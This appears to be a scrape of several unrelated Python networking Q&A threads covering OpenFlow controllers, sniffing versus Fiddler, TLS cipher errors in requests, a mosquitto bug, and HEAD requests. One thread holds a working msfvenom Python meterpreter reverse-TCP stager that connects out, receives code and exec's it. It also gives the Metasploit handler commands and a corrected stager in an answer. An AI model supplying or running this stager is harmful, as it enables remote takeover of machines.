Long story short, I have a project that requires me to create a controller from scratch in Python and handle requests, following the OpenFlow protocol, from switches created through a Mininet topology.
Helpful OpenFlow protocol resources:
https://www.opennetworking.org/wp-content/uploads/2014/10/openflow-switch-v1.5.1.pdf
http://flowgrammable.org/sdn/openflow/message-layer/
http://flowgrammable.org/sdn/openflow/message-layer/statsrequest/#ofp_1_3
My code is available here on github for cloning and full transparency:
[removed as of 10/12/2019, see my answer below]
The issue I am running into is that I am unable to send a multipart request message for the port stats description (search for PortDesc on the link above). When I view the packet data in Wireshark I get a "Range is out of bounds" error, and I haven't been able to figure out why. Here are a few screenshots of the packet data:
Wireshark captures:
Lua error messages:
Bad Request Error Message Response:
Something to note here is that the error code says OFPBRC_BAD_LEN (6), even though the multipart request I send is exactly 16 bytes long.
A classmate who sent their packet data correctly said that they were using the same packing structure that I am (see the Python struct documentation), except theirs is successful. I don't know what the issue could be with mine, and I am running out of ideas to check. Any pointers would be greatly appreciated.
TL;DR: I am unable to send a multipart request; even though I am adhering to the request specification, the switch keeps replying with an error code. Wireshark says "Range is out of bounds" and I do not know how else to structure my request to correct this.
I solved my problem, though I don't think I can say for certain what the problem was. I'll start with my solution, and then talk about what I believe the problem is.
Solution:
As you can see in the screenshots above, I was sending OpenFlow packets using the version 1.5 protocol, which is the newest version, but the OpenFlow message-layer documentation linked above only goes up to 1.4.
On top of that, the latest version it documents for the multipart request is 1.3.1. Worse, when I sent a multipart request as OpenFlow 1.5, it wasn't even dissected as the OpenFlow protocol, just as a regular TCP packet. I did the following three things:
1. In my topology file, where I create the switch, I was initializing the switches as s1 = self.addSwitch('s1'). What I added to this statement was the protocols parameter: s1 = self.addSwitch('s1', protocols='OpenFlow14').
2. For good measure, I also added the protocols specification to the mininet command in the console: sudo mn --custom mytopo.py --topo mytopo --controller=remote,ipaddr=127.0.0.1,port=6653,protocols=OpenFlow14
3. I also changed how I was packing the requests: instead of specifying version 1.5 (a '06' in the packet header), I packed it as 1.4 (a '05' in the packet header), e.g. req = struct.pack('!BBHI',5,5,8,0) for the features_request message sent to the switch.
These steps solved the issue I was running into and I was able to get a stats_reply from the switch.
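For reference, here is a minimal sketch of the 16-byte port-description multipart request as I now pack it for OpenFlow 1.4 (my original code is no longer on GitHub, so this is a reconstruction from the spec: OFPT_MULTIPART_REQUEST is message type 18, OFPMP_PORT_DESC is multipart type 13, and the xid of 1 is arbitrary):

import struct

# OpenFlow 1.4 header: version=5, type=18 (OFPT_MULTIPART_REQUEST),
# length=16, xid=1, followed by the multipart header:
# multipart type=13 (OFPMP_PORT_DESC), flags=0, and 4 bytes of padding.
req = struct.pack('!BBHIHH4x', 5, 18, 16, 1, 13, 0)
assert len(req) == 16  # matches the length field, and the 16 bytes noted above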
Problem (or what I think the problem is):
I believe the problem is that, as of right now, OpenFlow version 1.5 multipart requests are not yet supported by the tools I am using: when I send a port-description multipart request as version 1.5, it shows up as a regular TCP packet instead of an OpenFlow message.
For a script I am making, I need to be able to see the parameters that are sent with a request.
This is possible through Fiddler, but I am trying to automate the process.
Here are some screenshots to start with. As you can see in the first picture, from Fiddler, I can see the URL of a request and the parameters sent with that request.
I tried to do some packet sniffing with scapy, using the code below, to see if I could get a similar result, but what I get is in the second picture. Basically, I can get the source and destination of a packet as IP addresses, but the packets themselves are just bytes.
import time
from scapy.all import AsyncSniffer

def sniffer():
    # Sniff 10 packets in the background, printing a one-line summary of each
    t = AsyncSniffer(prn=lambda x: x.summary(), count=10)
    t.start()
    time.sleep(8)        # give the sniffer time to capture
    results = t.results  # list of captured packets
    print(len(results))
    print(results)
    print(results[0])
From my understanding, after we establish a TCP connection, the request is broken down into several IP packets and sent over to the destination. I would like to be able to replicate the functionality of Fiddler, where I can see the URL of the request and the values of the parameters being sent.
Would it be feasible to recreate the information of a request from only the information gathered from the packets?
Or is the difference because the sniffing is done on Layer 2, while Fiddler operates on Layer 3/4 before/after the translation into IP packets, so it sees the content of the original request itself and the result of reassembling the packets? If my understanding is wrong, please correct me.
Basically, my question boils down to: "Is there a Python module I can use to replicate the features of Fiddler, i.e. to identify the destination URL of a request and the parameters sent along with it?"
The sniffed traffic is HTTPS traffic - therefore, just by sniffing, you won't see any details of the HTTP request/response, because they are encrypted via SSL/TLS.
Fiddler is a proxy with HTTPS interception, which is something totally different from sniffing traffic at the network level. For the client application Fiddler "mimics" the server, and for the server Fiddler mimics the client. This allows Fiddler to decrypt the requests/responses and show them to you.
If you want to perform request interception at the Python level, I would recommend using mitmproxy instead of Fiddler. This proxy can also perform HTTPS interception, but it is written in Python and is therefore much easier to integrate into your Python environment.
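As a rough sketch (the script name is arbitrary, and this assumes a reasonably current mitmproxy version), an addon that prints each request's URL and parameters could look like this:

# log_requests.py -- run with: mitmdump -s log_requests.py
from mitmproxy import http

def request(flow: http.HTTPFlow) -> None:
    # Called once per intercepted request
    print(flow.request.pretty_url)
    for name, value in flow.request.query.items():
        print(f"  query param: {name}={value}")
    if flow.request.urlencoded_form:
        for name, value in flow.request.urlencoded_form.items():
            print(f"  form param: {name}={value}")

As with Fiddler, the client has to be pointed at the proxy and has to trust its CA certificate for HTTPS interception to work.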
Alternatively, if you just want to see the request/response details of a Python program, it may be easier to do so by setting the log level appropriately. See for example this question: Log all requests from the python-requests module
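A sketch of that approach (Python 3; the target URL is just an example):

import logging
import http.client

# Make the underlying HTTP machinery print request/response lines and headers
http.client.HTTPConnection.debuglevel = 1
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("urllib3").setLevel(logging.DEBUG)

import requests
requests.get("https://httpbin.org/get", params={"q": "example"})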
I have used msfvenom to create the following python payload:
import socket, struct

s = socket.socket(2, socket.SOCK_STREAM)   # 2 == AF_INET
s.connect(('MY PUBLIC IP', 3930))
l = struct.unpack('>I', s.recv(4))[0]      # first 4 bytes: big-endian length of the stage
d = s.recv(l)
while len(d) < l:                          # keep reading until the whole stage has arrived
    d += s.recv(l - len(d))
exec(d, {'s': s})                          # execute the received stage
I have then opened up msfconsole, and done the following:
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
set LHOST 192.168.0.186 (MY LOCAL IP)
set LPORT 3930
exploit
It begins the reverse TCP handler on 192.168.0.186:3930 and also starts the payload handler. However, when I run the script on another computer, the payload times out after waiting for about a minute, and msfconsole doesn't register anything. I have port-forwarded 3930 on the router. What am I doing wrong here?
This is the code I would use for a reverse TCP shell on Unix systems, with the details you've provided. However, I stumbled upon your post while searching for the same error, so this isn't 100% flawless. I've gotten it to work perfectly in the past, but just recently it has begun to lag: it runs once on an internal system, but anything after that gives me the same error message you got. I also get the same message when doing this over the WAN as opposed to the LAN, except then it doesn't run the first time either. What ISP do you have? It may be entirely dependent on that.
import socket, struct

s = socket.socket(2, 1)                 # 2 == AF_INET, 1 == SOCK_STREAM
s.connect(('IP ADDRESS', 3930))
l = struct.unpack('>I', s.recv(4))[0]   # length prefix of the stage
d = b''
while len(d) < l:                       # read exactly l bytes; recv() may return short reads
    d += s.recv(l - len(d))             # never request more than is still missing
exec(d, {'s': s})
I am trying to use requests to connect to a website that requires a client certificate.
import requests
r = requests.get(url, cert='path to cert')
print(r.status_code)
This works for one site that uses the same client cert. That server uses TLS_RSA_WITH_AES_128_CBC_SHA on TLS 1.0. However, my target site uses TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA on TLS 1.1. So basically, the difference is that TLS 1.0 works and TLS 1.1 doesn't. Everything works fine in the browser, so it must have something to do with Python's SSL.
I am using requests version 2.7.0 and I have requests[security] installed as well. pip freeze:
cffi==0.9.2
cryptography==0.8.1
ndg-httpsclient==0.3.3
pyasn1==0.1.7
pycparser==2.10
pyOpenSSL==0.15.1
requests==2.7.0
six==1.9.0
The specific error I am getting is requests.exceptions.SSLError: [SSL: TLSV1_ALERT_INTERNAL_ERROR] tlsv1 alert internal error (_ssl.c:600). This is on Windows 7 with Python 3.4.3. Unfortunately this is an internal machine, so I am stuck with Windows, and our internal mirror of PyPI does not have the latest versions of everything. It seems to me like this has something to do with ssl failing, and not necessarily requests.
Google does not give back promising results. There is a StackOverflow post that describes the same problem, but the solution provided there (using a custom adapter) does not work for me.
Hopefully someone else has run into this before and can give me some tips on how to fix it. Please and thanks.
EDIT: I did a Wireshark capture of the interaction. The SSL alert sent back is "Level: Fatal (2), Description: Internal Error (80)". After the TCP connection is established, my machine sends a Client Hello:
Content Type: Handshake (22)
Version: TLS 1.0 (0x0301)
Length: 512
Then the handshake protocol segment of that packet is
Handshake Type: Client Hello (1)
Length: 508
Version: TLS 1.2 (0x0303)
followed by a list of the supported cipher suites, etc. TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA is in the list of cipher suites sent by my client. The server ACKs this message, then sends the Alert packet.
I got rid of an identical SSLError by removing the first entry, ECDH+AESGCM (which the server seemed to have problems with), from requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS. The line
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:!eNULL:!MD5'
solved the problem for me.
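For context, here is a sketch of how that override fits into the question's snippet; the important part is that DEFAULT_CIPHERS is reassigned before the first request is made (the URL and cert path are placeholders):

import requests

# Drop the ECDH+AESGCM entry from urllib3's cipher list before any
# connection is opened; the rest of the list is unchanged.
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = (
    'DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+HIGH:'
    'DH+HIGH:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:'
    '!aNULL:!eNULL:!MD5'
)

url = 'https://example.com/'  # placeholder for the question's target site
r = requests.get(url, cert='path to cert')
print(r.status_code)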
For me, using requests.request('GET', ...) instead of requests.get(...) works.
And I got rid of the above SSLError by removing almost all of the leading entries:
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'RSA+AESGCM:RSA+AES:RSA+HIGH:RSA+3DES:!aNULL:!eNULL:!MD5'
I have a mosquitto setup with max_inflight_messages=1 (for in-order delivery). A client connected to the broker is able to receive messages, but after it publishes a message with QoS=2, it no longer receives any. This behavior appeared after changing max_inflight_messages to 1 from its default value; previously, the client was able to receive messages following the publish.
This was also tested with subscribe("/#") to ensure it was not a subscription error; a sketch of the test is below. Am I doing something wrong, or is this the expected behavior with max_inflight_messages=1?
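Roughly, the test looks like this (sketched with the paho-mqtt client; the broker address and topic are placeholders):

import paho.mqtt.client as mqtt

def on_message(client, userdata, msg):
    print("received:", msg.topic, msg.payload)

client = mqtt.Client()
client.on_message = on_message
client.connect("localhost", 1883)
client.subscribe("/#")                        # wildcard, to rule out a subscription problem
client.publish("some/topic", "hello", qos=2)  # after this publish, no more messages arrive
client.loop_forever()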
Thank you for your help.
Sam
Having done a quick test, it does look like this might be a bug in mosquitto. If you submit a bug report at http://bugs.launchpad.net/mosquitto then it'll make sure the problem doesn't get forgotten.
In the meantime, you can use max_inflight_messages greater than 1. The in-order delivery is actually quite robust even with max_inflight_messages set above 1. It's only likely to be a problem if your client is dropping messages in a particularly erratic manner, which in turn is only likely if your network disconnects frequently and the client is doing odd things.
Update: This is fixed for version 1.2.2.
I am using a server to send a piece of information to another server every second. The problem is that the other server's response is a few kilobytes, and this consumes bandwidth on the first server (about 2 GB an hour). I would like to send the request and ignore the response, not even receive it, to save bandwidth.
I use a small Python script for this task (using urllib). I don't mind using any other tool, or even another language, if it will only make the request.
A 5K reply is small stuff and is probably below the standard TCP window size of your OS. This means that even if you closed your network connection just after sending the request and checking only the very first bytes of the reply (to be sure the request was really received), the server would probably already have sent you the whole answer, with the packets already on the wire or on your computer.
If you cannot control (i.e. trim down) the server's reply to your notification, the only alternative I can think of is to add another service on the remote machine that waits for a simple command, does the real request locally, and sends back to you just the result code (see the sketch below). This can be done very easily, maybe even just with bash/perl/python using, for example, netcat/wget locally.
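A rough sketch of such a relay (the port number and the one-URL-per-connection protocol are arbitrary choices; this runs on the remote machine, so only the URL and the status code cross the metered link):

# remote_relay.py -- receives a URL, performs the request locally,
# and returns only the status code to the caller.
import socket
import urllib.request

srv = socket.socket()
srv.bind(('', 9000))      # arbitrary port
srv.listen(1)
while True:
    conn, _ = srv.accept()
    url = conn.recv(4096).decode().strip()
    try:
        code = urllib.request.urlopen(url).getcode()
    except Exception:
        code = 0          # sentinel for "request failed"
    conn.sendall(str(code).encode())  # a few bytes instead of kilobytes
    conn.close()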
By the way, there is something strange in your math, as Glenn Maynard correctly wrote in a comment.
For HTTP, you can send a HEAD request instead of GET or POST:
import urllib2
request = urllib2.Request('https://stackoverflow.com/q/5049244/')
request.get_method = lambda: 'HEAD' # override get_method
response = urllib2.urlopen(request) # make request
print response.code, response.url
Output
200 https://stackoverflow.com/questions/5049244/how-can-i-ignore-server-response-to-save-bandwidth
See How do you send a HEAD HTTP request in Python?
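(In Python 3, where urllib2 was folded into urllib.request, an equivalent sketch would be:)

import urllib.request

# method='HEAD' asks the server to send only headers, no body
request = urllib.request.Request('https://stackoverflow.com/q/5049244/', method='HEAD')
with urllib.request.urlopen(request) as response:
    print(response.status, response.url)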
Sorry, but this does not make much sense and is likely a violation of the HTTP protocol. I consider such an idea weird and broken by design. Either make the remote server stop sending the reply, or configure your application (or whatever is running on the remote server) to use a smarter protocol with less bandwidth usage at a different protocol level. Anything else is hard to see as anything but nonsense.